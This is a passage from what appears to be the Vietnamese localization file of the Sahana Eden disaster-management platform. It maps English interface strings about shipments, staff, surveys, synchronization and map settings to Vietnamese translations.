'Chọn tệp ngôn ngữ', 'Select the overlays for Assessments and Activities relating to each Need to identify the gap.': 'Lựa chọn lớp dữ liệu phủ cho Đánh giá và Hoạt động liên quan đến mỗi nhu cầu để xác định khoảng thiếu hụt.', 'Select the person assigned to this role for this project.': 'Chọn người được bổ nhiệm cho vai trò này trong dự án', 'Select the required modules': 'Chọn Modun cần thiết', 'Select': 'Chọn', 'Selected Questions for all Completed Assessment Forms': 'Câu hỏi được chọn cho tất cả các mẫu Đánh giá đã hoàn thành', 'Selects what type of gateway to use for outbound SMS': 'Chọn loại cổng để sử dụng tin nhắn gửi ra', 'Send Alerts using Email &/or SMS': 'Gửi Cảnh báo sử dụng thư điện từ &/hay SMS', 'Send Commitment': 'Gửi Cam kết', 'Send Dispatch Update': 'Gửi cập nhật ', 'Send Message': 'Gửi tin', 'Send New Shipment': 'Gửi Lô hàng Mới', 'Send Notification': 'Gửi thông báo', 'Send Shipment': 'Gửi Lô hàng', 'Send Task Notification': 'Gửi Thông báo Nhiệm vụ', 'Send a message to this person': 'Gửi tin nhắn cho người này', 'Send a message to this team': 'Gửi tin nhắn cho đội này', 'Send batch': 'Gửi hàng loạt', 'Send from %s': 'Gửi từ %s', 'Send message': 'Gửi tin nhắn', 'Send new message': 'Gửi tin nhắn mới', 'Send': 'Gửi', 'Sender': 'Người gửi', 'Senders': 'Người gửi', 'Senior (50+)': 'Người già (50+)', 'Senior Officer': 'Chuyên viên cao cấp', 'Sensitivity': 'Mức độ nhạy cảm', 'Sent By Person': 'Được gửi bởi Ai', 'Sent By': 'Được gửi bởi', 'Sent Shipment Details': 'Chi tiết lô hàng đã gửi', 'Sent Shipment canceled and items returned to Warehouse': 'Hủy lô hàng đã gửi và trả lại hàng hóa về kho Hàng', 'Sent Shipment canceled': 'Hủy lô hàng đã gửi', 'Sent Shipment has returned, indicate how many items will be returned to Warehouse.': 'Lô hàng được gửi đã được trả lại, nêu rõ bao nhiêu mặt hàng sẽ được trả lại kho hàng', 'Sent Shipment updated': 'Cập nhật Lô hàng đã gửi', 'Sent Shipments': 'Hàng chuyển', 'Sent date': 'Thời điểm gửi', 'Sent': 'đã được gửi', 'Separated': 'Ly thân', 'Serial Number': 'Số se ri', 'Series details missing': 'Chi tiết Se ri đang mất tích', 'Series': 'Se ri', 'Server': 'Máy chủ', 'Service Record': 'Hồ sơ hoạt động', 'Service or Facility': 'Dịch vụ hay Bộ phận', 'Service profile added': 'Đã thêm thông tin dịch vụ', 'Services Available': 'Các dịch vụ đang triển khai', 'Services': 'Dịch vụ', 'Set Base Facility/Site': 'Thiết lập Bộ phận/Địa bàn cơ bản', 'Set By': 'Thiết lập bởi', 'Set True to allow editing this level of the location hierarchy by users who are not MapAdmins.': 'Thiết lập Đúng để cho phép chỉnh sửa mức này của hệ thống hành chính địa điểm bởi người sử dụng không thuộc quản trị bản đồ', 'Setting Details': 'Chi tiết cài đặt', 'Setting added': 'Thêm cài đặt', 'Setting deleted': 'Xóa cài đặt', 'Settings were reset because authenticating with Twitter failed': 'Cài đặt được làm lại vì sự xác minh với Twitter bị lỗi', 'Settings which can be configured through the web interface are available here.': 'Cài đặt có thể được cấu hình thông quan tương tác với trang web có thể làm ở đây.', 'Settings': 'Các Cài đặt', 'Sex (Count)': 'Giới tính (Số lượng)', 'Sex': 'Giới tính', 'Sexual and Reproductive Health': 'Sức khỏe sinh sản và Sức khỏe tình dục', 'Share a common Marker (unless over-ridden at the Feature level)': 'Chia sẻ Đèn hiệu chung(nếu không vượt mức tính năng)', 'Shelter Registry': 'Đăng ký tạm trú', 'Shelter Repair Kit': 'Bộ dụng cụ sửa nhà', 'Shelter Service Details': 'Chi tiết dịch vụ cư trú', 'Shelter Services': 'Dịch vụ cư trú', 'Shelter added': 'Đã thêm Thông tin cư trú', 'Shelter deleted': 'Đã xóa nơi cư trú', 'Shelter': 'Nhà', 'Shelters': 'Địa điểm cư trú', 'Shipment Created': 'Tạo Lô hàng', 'Shipment Item Details': 'Chi tiết hàng hóa trong lô hàng', 'Shipment Item deleted': 'Xóa hàng hóa trong lô hàng', 'Shipment Item updated': 'Cập nhật hàng hóa trong lô hàng', 'Shipment Items Received': 'Hàng hóa trong lô hàng đã nhận được', 'Shipment Items sent from Warehouse': 'Hàng hóa trong lô hàng được gửi từ Kho hàng', 'Shipment Items': 'Hàng hóa trong lô hàng', 'Shipment Type': 'Loại Lô hàng', 'Shipment received': 'Lô hàng đã nhận được', 'Shipment to Receive': 'Lô hàng sẽ nhận được', 'Shipment to Send': 'Lô hàng sẽ gửi', 'Shipment': 'Lô hàng', 'Shipment/Way Bills': 'Đơn hàng/Hóa đơn vận chuyển', 'Shipment<>Item Relation added': 'Đã thêm đơn hàng <>hàng hóa liên quan', 'Shipment<>Item Relation deleted': 'Đã xóa dơn hàng <>Hàng hóa liên quan', 'Shipment<>Item Relation updated': 'Đã cập nhật Đơn hàng<>hàng hóa liên qua', 'Shipment<>Item Relations Details': 'Đơn hàng<>Chi tiết hàng hóa liên quan', 'Shipments': 'Các loại lô hàng', 'Shipping Organization': 'Tổ chức hàng hải', 'Shooting': 'Bắn', 'Short Description': 'Miêu tả ngắn gọn', 'Short Text': 'Đoạn văn bản ngắn', 'Short Title / ID': 'Tên viết tắt/ Mã dự án', 'Short-term': 'Ngắn hạn', 'Show Details': 'Hiển thị chi tiết', 'Show %(number)s entries': 'Hiển thị %(number)s hồ sơ', 'Show less': 'Thể hiện ít hơn', 'Show more': 'Thể hiện nhiều hơn', 'Show on Map': 'Thể hiện trên bản đồ', 'Show on map': 'Hiển thị trên bản đồ', 'Show totals': 'Hiển thị tổng', 'Show': 'Hiển thị', 'Showing 0 to 0 of 0 entries': 'Hiển thị 0 tới 0 của 0 hồ sơ', 'Showing _START_ to _END_ of _TOTAL_ entries': 'Hiển thị _START_ tới _END_ của _TOTAL_ hồ sơ', 'Showing latest entries first': 'Hiển thị hồ sơ mới nhất trước', 'Signature / Stamp': 'Chữ ký/dấu', 'Signature': 'Chữ ký', 'Simple Search': 'Tìm kiếm cơ bản', 'Single PDF File': 'File PDF', 'Single': 'Độc thân', 'Site Address': 'Địa chỉ trang web ', 'Site Administration': 'Quản trị Site', 'Site Manager': 'Quản trị website ', 'Site Name': 'Tên địa điểm', 'Site updated': 'Đã cập nhật site', 'Site': 'Địa điểm', 'Sitemap': 'Bản đồ địa điểm', 'Sites': 'Trang web', 'Situation Awareness & Geospatial Analysis': 'Nhận biết tình huống và phân tích tọa độ địa lý', 'Situation': 'Tình hình', 'Skeleton Example': 'Ví dụ khung', 'Sketch': 'Phác thảo', 'Skill Catalog': 'Danh mục kỹ năng', 'Skill Details': 'Chi tiết kỹ năng', 'Skill Equivalence Details': 'Chi tiết Kỹ năng tương ứng', 'Skill Equivalence added': 'Thêm Kỹ năng tương ứng', 'Skill Equivalence deleted': 'Xóa Kỹ năng tương ứng', 'Skill Equivalence updated': 'Cập nhật Kỹ năng tương ứng', 'Skill Equivalence': 'Kỹ năng tương ứng', 'Skill Equivalences': 'các Kỹ năng tương ứng', 'Skill Type Catalog': 'Danh mục Loại Kỹ năng', 'Skill Type added': 'Thêm Loại Kỹ năng', 'Skill Type deleted': 'Xóa Loại Kỹ năng', 'Skill Type updated': 'Cập nhật Loại Kỹ năng', 'Skill Type': 'Loại Kỹ năng', 'Skill added to Request': 'Thêm Kỹ năng vào Yêu cầu', 'Skill added': 'Thêm Kỹ năng', 'Skill deleted': 'Xóa kỹ năng', 'Skill removed from Request': 'Bỏ kỹ năng khỏi yêu cầu', 'Skill removed': 'Bỏ kỹ năng', 'Skill updated': 'Cập nhật kỹ năng', 'Skill': 'Kỹ năng', 'Skills': 'Kỹ năng', 'Smoke': 'Khói', 'Snapshot': 'Chụp ảnh', 'Snow Fall': 'Tuyết rơi', 'Snow Squall': 'Tiếng tuyết rơi', 'Social Impact & Resilience': 'Khả năng phục hồi và Tác động xã hội', 'Social Inclusion & Diversity': 'Đa dạng hóa/ Tăng cường hòa nhập xã hội', 'Social Insurance Number': 'Số sổ BHXH', 'Social Insurance': 'Bảo hiểm xã hội', 'Social Mobilization': 'Huy động xã hội', 'Solid Waste Management': 'Quản lý chất thải rắn', 'Solution added': 'Đã thêm giải pháp', 'Solution deleted': 'Đã xóa giải pháp', 'Solution updated': 'Đã cập nhật giải pháp', 'Sorry - the server has a problem, please try again later.': 'Xin lỗi - Máy chủ có sự cố, vui lòng thử lại sau.', 'Sorry location %(location)s appears to be outside the area of parent %(parent)s.': 'Xin lỗi địa điểm %(location)s có vẻ như ngoài vùng của lớp trên %(parent)s', 'Sorry location %(location)s appears to be outside the area supported by this deployment.': 'Xin lỗi địa điểm %(location)s có vẻ như ngoài vùng hỗ trợ bởi đợt triển khai này', 'Sorry location appears to be outside the area of parent %(parent)s.': 'Xin lỗi địa điểm có vẻ như ngoài vùng của lớp trên %(parent)s', 'Sorry location appears to be outside the area supported by this deployment.': 'Xin lỗi địa điểm có vẻ như ngoài vùng hỗ trợ bởi đợt triển khai này', 'Sorry, I could not understand your request': 'Xin lỗi, tôi không thể hiểu yêu cầu của bạn', 'Sorry, only users with the MapAdmin role are allowed to edit these locations': 'Xin lỗi, chỉ người sử dụng có chức năng quản trị bản đồ được phép chỉnh sửa các địa điểm này', 'Sorry, something went wrong.': 'Xin lỗi, có sự cố.', 'Sorry, that page is forbidden for some reason.': 'Xin lỗi, vì một số lý do trang đó bị cấm.', 'Sorry, that service is temporary unavailable.': 'Xin lỗi, dịch vụ đó tạm thời không có', 'Sorry, there are no addresses to display': 'Xin lỗi, Không có địa chỉ để hiện thị', 'Source Type': 'Loại nguồn', 'Source not specified!': 'Nguồn không xác định', 'Source': 'Nguồn', 'Space Debris': 'Rác vũ trụ', 'Spanish': 'Người Tây Ban Nha', 'Special Ice': 'Băng tuyết đặc biệt', 'Special Marine': 'Thủy quân đặc biệt', 'Special needs': 'Nhu cầu đặc biệt', 'Specialized Hospital': 'Bệnh viện chuyên khoa', 'Specific Area (e.g. Building/Room) within the Location that this Person/Group is seen.': 'Khu vực cụ thể (ví dụ Tòa nhà/Phòng) trong khu vực mà người/Nhóm đã xem', 'Specific locations need to have a parent of level': 'Các địa điểm cụ thể cần có lớp trên', 'Specify a descriptive title for the image.': 'Chỉ định một tiêu đề mô tả cho ảnh', 'Spherical Mercator (900913) is needed to use OpenStreetMap/Google/Bing base layers.': 'Spherical Mercator (900913) cần thiết để sử dụng OpenStreetMap/Google/Bing như là lớp bản đồ cơ sở.', 'Spreadsheet': 'Bảng tính', 'Squall': 'tiếng kêu', 'Staff & Volunteers (Combined)': 'Cán bộ & TNV', 'Staff & Volunteers': 'Cán bộ & Tình nguyện viên', 'Staff Assigned': 'Cán bộ được bộ nhiệm', 'Staff Assignment Details': 'Chi tiết bổ nhiệm cán bộ', 'Staff Assignment removed': 'Bỏ bổ nhiệm cán bộ', 'Staff Assignment updated': 'Cập nhật bổ nhiệm cán bộ', 'Staff Assignments': 'Các bổ nhiệm cán bộ', 'Staff ID': 'Định danh cán bộ', 'Staff Level': 'Ngạch công chức', 'Staff Management': 'Quản lý cán bộ', 'Staff Member Details updated': 'Cập nhật chi tiết cán bộ', 'Staff Member Details': 'Chi tiết cán bộ', 'Staff Member deleted': 'Xóa Cán bộ', 'Staff Record': 'Hồ sơ cán bộ', 'Staff Report': 'Cán bộ', 'Staff Type Details': 'Chi tiết bộ phận nhân viên', 'Staff deleted': 'Xóa tên nhân viên', 'Staff member added': 'Thêm cán bộ', 'Staff with Contracts Expiring in the next Month': 'Cán bộ hết hạn hợp đồng tháng tới', 'Staff': 'Cán bộ', 'Staff/Volunteer Record': 'Hồ sơ Cán bộ/Tình nguyện viên', 'Staff/Volunteer': 'Cán bộ/Tình nguyện viên', 'Start Date': 'Ngày bắt đầu', 'Start date': 'Ngày bắt đầu', 'Start of Period': 'Khởi đầu chu kỳ', 'Start': 'Bắt đầu', 'State / Province (Count)': 'Tỉnh / Thành phố (Số lượng)', 'State / Province': 'Tỉnh', 'Station Parameters': 'Thông số trạm', 'Statistics Parameter': 'Chỉ số thống kê', 'Statistics': 'Thống kê', 'Stats Group': 'Nhóm thống kê', 'Status Details': 'Chi tiết Tình trạng', 'Status Report': 'Báo cáo tình trạng ', 'Status Updated': 'Cập nhật Tình trạng', 'Status added': 'Thêm Tình trạng', 'Status deleted': 'Xóa Tình trạng', 'Status of adjustment': 'Điều chỉnh Tình trạng', 'Status of operations of the emergency department of this hospital.': 'Tình trạng hoạt động của phòng cấp cứu tại bệnh viện này', 'Status of security procedures/access restrictions in the hospital.': 'Trạng thái của các giới hạn thủ tục/truy nhập an ninh trong bệnh viện', 'Status of the operating rooms of this hospital.': 'Trạng thái các phòng bệnh trong bệnh viện này', 'Status updated': 'Cập nhật Tình trạng', 'Status': 'Tình trạng', 'Statuses': 'Các tình trạng', 'Stock Adjustment Details': 'Chi tiết điều chỉnh hàng lưu kho', 'Stock Adjustments': 'Điều chỉnh Hàng lưu kho', 'Stock Expires %(date)s': 'Hàng lưu kho hết hạn %(date)s', 'Stock added to Warehouse': 'Hàng hóa lưu kho được thêm vào Kho hàng', 'Stock in Warehouse': 'Hàng lưu kho', 'Stock removed from Warehouse': 'Hàng lưu kho được lấy ra khỏi Kho hàng', 'Stock': 'Hàng lưu kho', 'Stockpiling, Prepositioning of Supplies': 'Dự trữ hàng hóa', 'Stocks and relief items.': 'Kho hàng và hàng cứu trợ.', 'Stolen': 'Bị mất cắp', 'Store spreadsheets in the Eden database': 'Lưu trữ bảng tính trên cơ sở dữ liệu của Eden', 'Storm Force Wind': 'Sức mạnh Gió bão', 'Storm Surge': 'Bão biển gây nước dâng', 'Stowaway': 'Đi tàu lậu', 'Strategy': 'Chiến lược', 'Street Address': 'Địa chỉ', 'Street View': 'Xem kiểu đường phố', 'Strengthening Livelihoods': 'Cải thiện nguồn sinh kế', 'Strong Wind': 'Gió bão', 'Strong': 'Mạnh', 'Structural Safety': 'An toàn kết cấu trong xây dựng', 'Style Field': 'Kiểu trường', 'Style Values': 'Kiểu giá trị', 'Style': 'Kiểu', 'Subject': 'Tiêu đề', 'Submission successful - please wait': 'Gửi thành công - vui lòng đợi', 'Submit Data': 'Gửi dữ liệu', 'Submit New (full form)': 'Gửi mới (mẫu đầy đủ)', 'Submit New (triage)': 'Gửi mới (cho nhóm 3 người)', 'Submit New': 'Gửi mới', 'Submit all': 'Gửi tất cả', 'Submit data to the region': 'Gửi dữ liệu cho vùng', 'Submit more': 'Gửi thêm', 'Submit online': 'Gửi qua mạng', 'Submit': 'Gửi', 'Submitted by': 'Được gửi bởi', 'Subscription deleted': 'Đã xóa đăng ký', 'Subscriptions': 'Quyên góp', 'Subsistence Cost': 'Mức sống tối thiểu', 'Successfully registered at the repository.': 'Đã đăng ký thành công vào hệ thống', 'Suggest not changing this field unless you know what you are doing.': 'Khuyến nghị bạn không thay đổi trường này khi chưa chắc chắn', 'Sum': 'Tổng', 'Summary Details': 'Thông tin tổng hợp', 'Summary by Question Type - (The fewer text questions the better the analysis can be)': 'Tổng hợp theo loại câu hỏi - (Phân tích dễ dàng hơn nếu có ít câu hỏi bằng chữ)', 'Summary of Completed Assessment Forms': 'Tổng hợp biểu mẫu đánh giá đã hoàn thành', 'Summary of Incoming Supplies': 'Tổng hợp mặt hàng đang đến', 'Summary of Releases': 'Tổng hợp bản tin báo chí', 'Summary': 'Tổng hợp', 'Supplier Details': 'Thông tin nhà cung cấp', 'Supplier added': 'Nhà cung cấp đã được thêm', 'Supplier deleted': 'Nhà cung cấp đã được xóa', 'Supplier updated': 'Nhà cung cấp đã được cập nhật', 'Supplier': 'Nhà cung cấp', 'Supplier/Donor': 'Nhà cung cấp/Nhà tài trợ', 'Suppliers': 'Nhà cung cấp', 'Supply Chain Management': 'Quản lý dây chuyền cung cấp', 'Support Request': 'Hỗ trợ yêu cầu', 'Support Requests': 'Yêu cầu hỗ trợ', 'Support': 'Trợ giúp', 'Surplus': 'Thặng dư', 'Survey Answer Details': 'Chi tiết trả lời câu hỏi khảo sát', 'Survey Answer added': 'Đã thêm trả lời khảo sát', 'Survey Name': 'Tên khảo sát', 'Survey Question Display Name': 'Tên trên bảng câu hỏi khảo sát', 'Survey Question updated': 'cập nhật câu hỏi khảo sát', 'Survey Section added': 'Đã thêm khu vực khảo sát', 'Survey Section updated': 'Cập nhật khu vực khảo sát', 'Survey Series added': 'Đã thêm chuỗi khảo sát', 'Survey Series deleted': 'Đã xóa chuỗi khảo sát', 'Survey Series updated': 'Đã cập nhật serie khảo sát', 'Survey Series': 'Chuỗi khảo sát', 'Survey Template added': 'Thêm mẫu Khảo sát', 'Survey Templates': 'Mẫu khảo sát', 'Swiss Francs': 'Frăng Thụy Sỹ', 'Switch to 3D': 'Chuyển sang 3D', 'Symbologies': 'Các biểu tượng', 'Symbology Details': 'Chi tiết biểu tượng', 'Symbology added': 'Thêm biểu tượng', 'Symbology deleted': 'Xóa biểu tượng', 'Symbology removed from Layer': 'Bỏ biểu tượng khỏi lớp', 'Symbology updated': 'Cập nhật biểu tượng', 'Symbology': 'Biểu tượng', 'Sync Conflicts': 'Xung đột khi đồng bộ hóa', 'Sync Now': 'Đồng bộ hóa ngay bây giờ', 'Sync Partners': 'Đối tác đồng bộ', 'Sync Schedule': 'Lịch đồng bộ', 'Sync process already started on ': 'Quá trinh đồng bộ đã bắt đầu lúc ', 'Synchronization Job': 'Chức năng Đồng bộ hóa', 'Synchronization Log': 'Danh mục Đồng bộ hóa', 'Synchronization Schedule': 'Kế hoạch Đồng bộ hóa', 'Synchronization Settings': 'Các cài đặt Đồng bộ hóa', 'Synchronization allows you to share data that you have with others and update your own database with latest data from other peers. This page provides you with information about how to use the synchronization features of Sahana Eden': 'Đồng bộ hóa cho phép bạn chia sẻ dữ liệu và cập nhật cơ sở dữ liệu với các máy khác.Trang này hường dẫn bạn cách sử dụng các tính năng đồng bộ của Sahana Eden', 'Synchronization currently active - refresh page to update status.': 'Đồng bộ hóa đang chạy - làm mới trang để cập nhật tình trạng', 'Synchronization mode': 'Chế độ đồng bộ hóa', 'Synchronization not configured.': 'Chưa thiết đặt đồng bộ hóa', 'Synchronization settings updated': 'Các cài đặt đồng bộ hóa được cập nhật', 'Synchronization': 'Đồng bộ hóa', 'Syncronization History': 'Lịch sử đồng bộ hóa', 'System keeps track of all Volunteers working in the disaster region. It captures not only the places where they are active, but also captures information on the range of services they are providing in each area.': 'Hệ thống theo sát quá trình làm việc của các tình nguyện viên trong khu vực thiên tai.Hệ thống nắm bắt không chỉ vị trí hoạt động mà còn cả thông tin về các dịch vụ đang cung cấp trong mỗi khu vực', 'THOUSAND_SEPARATOR': 'Định dạng hàng nghìn', 'TMS Layer': 'Lớp TMS', 'TO': 'TỚI', 'Table Permissions': 'Quyền truy cập bảng', 'Table name of the resource to synchronize': 'Bảng tên nguồn lực để đồng bộ hóa', 'Table': 'Bảng thông tin', 'Tablename': 'Tên bảng', 'Tags': 'Các bảng tên', 'Task Details': 'Các chi tiết nhiệm vụ', 'Task List': 'Danh sách Nhiệm vụ', 'Task added': 'Nhiệm vụ được thêm vào', 'Task deleted': 'Nhiệm vụ đã xóa', 'Task updated': 'Nhiệm vụ được cập nhật', 'Task': 'Nhiệm vụ', 'Tasks': 'Nhiệm vụ', 'Team Description': 'Mô tả về Đội/Nhóm', 'Team Details': 'Thông tin về Đội/Nhóm', 'Team ID': 'Mã Đội/Nhóm', 'Team Leader': 'Đội trưởng', 'Team Members': 'Thành viên Đội/Nhóm', 'Team Name': 'Tên Đội/Nhóm', 'Team Type': 'Loại hình Đội/Nhóm', 'Team added': 'Đội/ Nhóm đã thêm', 'Team deleted': 'Đội/ Nhóm đã xóa', 'Team updated': 'Đội/ Nhóm đã cập nhật', 'Team': 'Đội', 'Teams': 'Đội/Nhóm', 'Technical Disaster': 'Thảm họa liên quan đến công nghệ', 'Telephony': 'Đường điện thoại', 'Tells GeoServer to do MetaTiling which reduces the number of duplicate labels.': 'Yêu cầu GeoServer làm MetaTiling để giảm số nhãn bị lặp', 'Template Name': 'Tên Biểu mẫu', 'Template Section Details': 'Chi tiết Mục Biểu mẫu', 'Template Section added': 'Mục Biểu mẫu được thêm', 'Template Section deleted': 'Mục Biểu mẫu đã xóa', 'Template Section updated': 'Mục Biểu mẫu được cập nhật', 'Template Sections': 'Các Mục Biểu mẫu', 'Template Summary': 'Tóm tắt Biểu mẫu', 'Template': 'Biểu mẫu', 'Templates': 'Biểu mẫu', 'Term for the fifth-level within-country administrative division (e.g. a voting or postcode subdivision). This level is not often used.': 'Khái niệm về sự phân chia hành chính trong nước cấp thứ năm (ví dụ như sự phân chia bầu cử hay mã bưu điện). Mức này thường ít được dùng', 'Term for the fourth-level within-country administrative division (e.g. Village, Neighborhood or Precinct).': 'Khái niệm về sự phân chia hành chính cấp thứ tư bên trong quốc gia (ví dụ như làng, hàng xóm hay bản)', 'Term for the primary within-country administrative division (e.g. State or Province).': 'Khái niệm về sự phân chia hành chính trong nước cấp một (ví dụ như Bang hay Tỉnh)', 'Term for the secondary within-country administrative division (e.g. District or County).': 'Khái niệm về sự phân chia hành chính trong nước cấp thứ hai (ví dụ như quận huyện hay thị xã)', 'Term for the third-level within-country administrative division (e.g. City or Town).': 'Khái niệm về sự phân chia hành chính trong nước cấp thứ ba (ví dụ như thành phố hay thị trấn)', 'Term': 'Loại hợp đồng', 'Terms of Service:': 'Điều khoản Dịch vụ:', 'Terrorism': 'Khủng bố', 'Tertiary Server (Optional)': 'Máy chủ Cấp ba (Tùy chọn)', 'Text Color for Text blocks': 'Màu vản bản cho khối văn bản', 'Text': 'Từ khóa', 'Thank you for your approval': 'Cảm ơn bạn vì sự phê duyệt', 'Thank you, the submission%(br)shas been declined': 'Cảm ơn bạn, lời đề nghị %(br)s đã bị từ chối', 'Thanks for your assistance': 'Cám ơn sự hỗ trợ của bạn', 'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1 == db.table2.field2" results in a SQL JOIN.': '"Câu hỏi" là một điều kiện có dạng "db.bảng1.trường1==\'giá trị\'". Bất kỳ cái gì có dạng "db.bảng1.trường1 == db.bảng2.trường2" đều có kết quả là một SQL THAM GIA.', 'The Area which this Site is located within.': 'Khu vực có chứa Địa điểm này', 'The Assessment Module stores assessment templates and allows responses to assessments for specific events to be collected and analyzed': 'Mô đun Khảo sát Đánh giá chứa các biểu mẫu khảo sát đánh giá và cho phép thu thập và phân tích các phản hồi đối với khảo sát đánh giá cho các sự kiện cụ thể', 'The Author of this Document (optional)': 'Tác giá của Tài liệu này (tùy chọn)', 'The Bin in which the Item is being stored (optional).': 'Ngăn/ Khu vực chứa hàng (tùy chọn)', 'The Current Location of the Person/Group, which can be general (for Reporting) or precise (for displaying on a Map). Enter a few characters to search from available locations.': 'Địa điểm hiện tại của Người/ Nhóm, có thể là chung chung (dùng để Báo cáo) hoặc chính xác (dùng để thể hiện trên Bản đồ). Nhập các ký tự để tìm kiếm từ các địa điểm hiện có.', 'The Email Address to which approval requests are sent (normally this would be a Group mail rather than an individual). If the field is blank then requests are approved automatically if the domain matches.': 'Địa chỉ thư điện tử để gửi các yêu cầu phê duyệt (thông thường địa chỉ này là một nhóm các địa chỉ chứ không phải là các địa chỉ đơn lẻ). Nếu trường này bị bỏ trống thì các yêu cầu sẽ được tự động chấp thuận nếu miền phù hợp.', 'The Incident Reporting System allows the General Public to Report Incidents & have these Tracked.': 'Hệ thống Báo cáo Sự kiện cho phép ', 'The Location the Person has come from, which can be general (for Reporting) or precise (for displaying on a Map). Enter a few characters to search from available locations.': 'Địa điểm xuất phát của Người, có thể chung chung (dùng cho Báo cáo) hay chính xác (dùng để thể hiện trên Bản đồ). Nhập một số ký tự để tìm kiếm từ các địa điểm đã có.', 'The Location the Person is going to, which can be general (for Reporting) or precise (for displaying on a Map). Enter a few characters to search from available locations.': 'Địa điểm mà Người chuẩn bị đến, có thể là chung chung (dùng cho Báo cáo) hay chính xác (dùng để thể hiện trên Bản đồ). Nhập một số ký tự để tìm kiếm từ các địa điểm đã có.', 'The Media Library provides a catalog of digital media.': 'Thư viện Đa phương tiện cung cấp một danh mục các phương tiện số.', 'The Messaging Module is the main communications hub of the Sahana system. It is used to send alerts and/or messages using SMS & Email to various groups and individuals before, during and after a disaster.': 'Chức năng nhắn tin là trung tâm thông tin chính của hệ thống Sahana. Chức năng này được sử dụng để gửi cảnh báo và/ hoặc tin nhắn dạng SMS và email tới các nhóm và cá nhân trước, trong và sau thảm họa.', 'The Organization Registry keeps track of all the relief organizations working in the area.': 'Cơ quan đăng ký Tổ chức theo dõi tất cả các tổ chức cứu trợ đang hoạt động trong khu vực.', 'The Organization this record is associated with.': 'Tổ chức được ghi liên kết với.', 'The Role this person plays within this hospital.': 'Vai trò của người này trong bệnh viện', 'The Tracking Number %s is already used by %s.': 'Số Theo dõi %s đã được sử dụng bởi %s.', 'The URL for the GetCapabilities page of a Web Map Service (WMS) whose layers you want available via the Browser panel on the Map.': 'URL cho trang GetCapabilities của một Dịch vụ Bản đồ Mạng (WMS) có các lớp mà bạn muốn có thông qua bảng Trình duyệt trên Bản đồ.', 'The URL of your web gateway without the post parameters': 'URL của cổng mạng của bạn mà không có các thông số điện tín', 'The URL to access the service.': 'URL để truy cập dịch vụ.', 'The answers are missing': 'Chưa có các câu trả lời', 'The area is': 'Khu vực là', 'The attribute which is used for the title of popups.': 'Thuộc tính được sử dụng cho tiêu đề của các cửa sổ tự động hiển thị.', 'The attribute within the KML which is used for the title of popups.': 'Thuộc tính trong KML được sử dụng cho tiêu đề của các cửa sổ tự động hiển thị.', 'The attribute(s) within the KML which are used for the body of popups. (Use a space between attributes)': '(Các) thuộc tính trong KML được sử dụng cho phần nội dung của các cửa sổ tự động hiển thị. (Sử dụng dấu cách giữa các thuộc tính)', 'The body height (crown to heel) in cm.': 'Chiều cao của phần thân (từ đầu đến chân) tính theo đơn vị cm.', 'The contact person for this organization.': 'Người chịu trách nhiệm liên lạc cho tổ chức này', 'The facility where this position is based.': 'Bộ phận mà vị trí này trực thuộc', 'The first or only name of the person (mandatory).': 'Tên (bắt buộc phải điền).', 'The following %s have been added': '%s dưới đây đã được thêm vào', 'The following %s have been updated': '%s dưới đây đã được cập nhật', 'The form of the URL is http://your/web/map/service?service=WMS&request=GetCapabilities where your/web/map/service stands for the URL path to the WMS.': 'Dạng URL là http://your/web/map/service?service=WMS&request=GetCapabilities where your/web/map/service stands for the URL path to the WMS.', 'The hospital this record is associated with.': 'Bệnh viện lưu hồ sơ này', 'The language you wish the site to be displayed in.': 'Ngôn ngữ bạn muốn đê hiển thị trên trang web', 'The length is': 'Chiều dài là', 'The list of Brands are maintained by the Administrators.': 'Danh sách các Chi nhánh do Những người quản lý giữ.', 'The list of Catalogs are maintained by the Administrators.': 'Danh sách các Danh mục do Những người quản lý giữ.', 'The list of Item categories are maintained by the Administrators.': 'Danh sách category hàng hóa được quản trị viên quản lý', 'The map will be displayed initially with this latitude at the center.': 'Bản đồ sẽ được thể hiện đầu tiên với vĩ độ này tại địa điểm trung tâm.', 'The map will be displayed initially with this longitude at the center.': 'Bản đồ sẽ được thể hiện đầu tiên với kinh độ này tại địa điểm trung tâm.', 'The minimum number of features to form a cluster.': 'Các đặc điểm tối thiểu để hình thành một nhóm.', 'The name to be used when calling for or directly addressing the person (optional).': 'Tên được sử dụng khi gọi người này (tùy chọn).', 'The number geographical units that may be part of the aggregation': 'Số đơn vị địa lý có thể là một phần của tổ hợp', 'The number of Units of Measure of the Alternative Items which is equal to One Unit of Measure of the Item': 'Số Đơn vị Đo của Các mặt hàng thay thế bằng với Một Đơn vị Đo của Mặt hàng đó', 'The number of aggregated records': 'Số bản lưu đã được tổng hợp', 'The number of pixels apart that features need to be before they are clustered.': 'Số điểm ảnh ngoài mà các đặc điểm cần trước khi được nhóm', 'The number of tiles around the visible map to download. Zero means that the 1st page loads faster, higher numbers mean subsequent panning is faster.': 'Số lớp để tải về quanh bản đồ được thể hiện. Không có nghĩa là trang đầu tiên tải nhanh hơn, các con số cao hơn nghĩa là việc quét sau nhanh hơn.', 'The person reporting about the missing person.': 'Người báo cáo về người mất tích', 'The post variable containing the phone number': 'Vị trí có thể thay đổi đang chứa số điện thoại', 'The post variable on the URL used for sending messages': 'Vị trí có thể thay đổi trên URL được dùng để gửi tin nhắn', 'The post variables other than the ones containing the message and the phone number': 'Vị trí có thể thay đổi khác với các vị trí đang chứa các tin nhắn và số điện thoại', 'The serial port at which the modem is connected - /dev/ttyUSB0, etc on linux and com1, com2, etc on Windows': 'Chuỗi cổng kết nối mô đem - /dev/ttyUSB0, v.v. trên linux và com1, com2, v.v. trên Windows', 'The server did not receive a timely response from another server that it was accessing to fill the request by the browser.': 'Máy chủ không nhận được một phản hồi kịp thời từ một máy chủ khác khi đang truy cập để hoàn tất yêu cầu bằng bộ trình duyệt.', 'The server received an incorrect response from another server that it was accessing to fill the request by the browser.': 'Máy chủ đã nhận được một phản hồi sai từ một máy chủ khác khi đang truy cập để hoàn tất yêu cầu bằng bộ trình duyệt.', 'The simple policy allows anonymous users to Read & registered users to Edit. The full security policy allows the administrator to set permissions on individual tables or records - see models/zzz.py.': 'Các chính sách đơn giản cho phép người dùng ẩn danh đọc và đăng ký để chỉnh sửa. Các chính sách bảo mật đầy đủ cho phép quản trị viên thiết lập phân quyền trên các bảng cá nhân hay - xem mô hình / zzz.py.', 'The staff responsibile for Facilities can make Requests for assistance. Commitments can be made against these Requests however the requests remain open until the requestor confirms that the request is complete.': 'Cán bộ chịu trách nhiệm về Các cơ sở có thể đưa ra Yêu cầu trợ giúp. Các cam kết có thể được đưa ra đối với những Yêu cầu này tuy nhiên các yêu cầu này phải để mở cho đến 